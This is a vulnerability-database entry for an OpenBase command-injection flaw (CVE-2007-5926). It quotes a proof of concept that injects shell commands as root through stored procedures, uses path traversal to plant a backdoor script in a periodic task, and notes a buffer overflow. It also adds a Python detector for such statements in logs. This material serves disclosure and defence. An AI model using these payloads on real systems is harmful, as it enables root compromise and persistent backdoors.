OpenBase Command Injection Vulnerability

Vulnerability ID: 1113901
Vulnerability type: Input validation
Published: 2007-11-05
Updated: 2007-11-12
CVE ID: CVE-2007-5926
CNNVD-ID: CNNVD-200711-142
Affected platform: Multiple
CVSS score: 9.0
|Vulnerability source
https://www.exploit-db.com/exploits/30742
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-142
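|Vulnerability details
OpenBase is a database server application that provides high-speed access to structured data. OpenBase's implementation of stored procedures contains a vulnerability: a remote authenticated user may be able to execute arbitrary commands through shell characters in the parameters of AsciiBackup, OEMLicenseInstall and possibly other stored procedures.
|Exploit (EXP)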
source: http://www.securityfocus.com/bid/26347/info

OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.

An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate the complete compromise of affected computers.

1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1>  call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root
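
For reviewing database statement logs for the patterns shown above, the following is an added example, not part of the original advisory or of OpenBase itself. It assumes the statements are available as plain strings; the function names and the two benign sample statements are constructed for illustration.

```python
import re

# Stored procedures this page names as reachable with attacker-controlled arguments.
WATCHED = {"asciibackup", "oemlicenseinstall", "globallog"}

CALL = re.compile(r"\bcall\s+(\w+)\s*\((.*)\)", re.I | re.S)
STRING_ARG = re.compile(r"'([^']*)'|\"([^\"]*)\"", re.S)
SHELL_META = re.compile(r"`|\$\(|[;|&<>]")      # command substitution, chaining, redirection
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")   # a ".." path component


def inspect_statement(sql):
    """Return sorted (procedure, reason) findings for one SQL statement."""
    m = CALL.search(sql)
    if not m or m.group(1).lower() not in WATCHED:
        return []
    proc, findings = m.group(1), set()
    for single, double in STRING_ARG.findall(m.group(2)):
        arg = single or double
        if SHELL_META.search(arg):
            findings.add((proc, "shell-metacharacter"))
        if TRAVERSAL.search(arg):
            findings.add((proc, "path-traversal"))
    return sorted(findings)


def scan(statements):
    """Map each flagged statement to its findings; clean statements are omitted."""
    return {s: f for s in statements if (f := inspect_statement(s))}


# Constructed sample log: the first and last entries are benign inventions,
# the other two are statements quoted in the advisory text above.
SAMPLE_LOG = [
    "select title from MOVIE",
    "call AsciiBackup('`id`')",
    'call GlobalLog("../../../../../../etc/periodic/daily/600"\n, "\\n/usr/bin/id > /tmp/file\\n")',
    "call AsciiBackup('/Backups')",
]

if __name__ == "__main__":
    for stmt, findings in scan(SAMPLE_LOG).items():
        print(findings, "<-", stmt.replace("\n", " "))
```

A hit is a reason to review the session that issued the statement, not proof of compromise. String literals containing embedded quote characters are not parsed by this sketch.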
|References

Source: XF
Name: openbase-stored-command-execution(38291)
Link: http://xforce.iss.net/xforce/xfdb/38291
Source: BID
Name: 26347
Link: http://www.securityfocus.com/bid/26347
Source: MISC
Link: http://www.netragard.com/pdfs/research/NETRAGARD-20070313-OPENBASE.txt
Source: SECUNIA
Name: 27525
Link: http://secunia.com/advisories/27525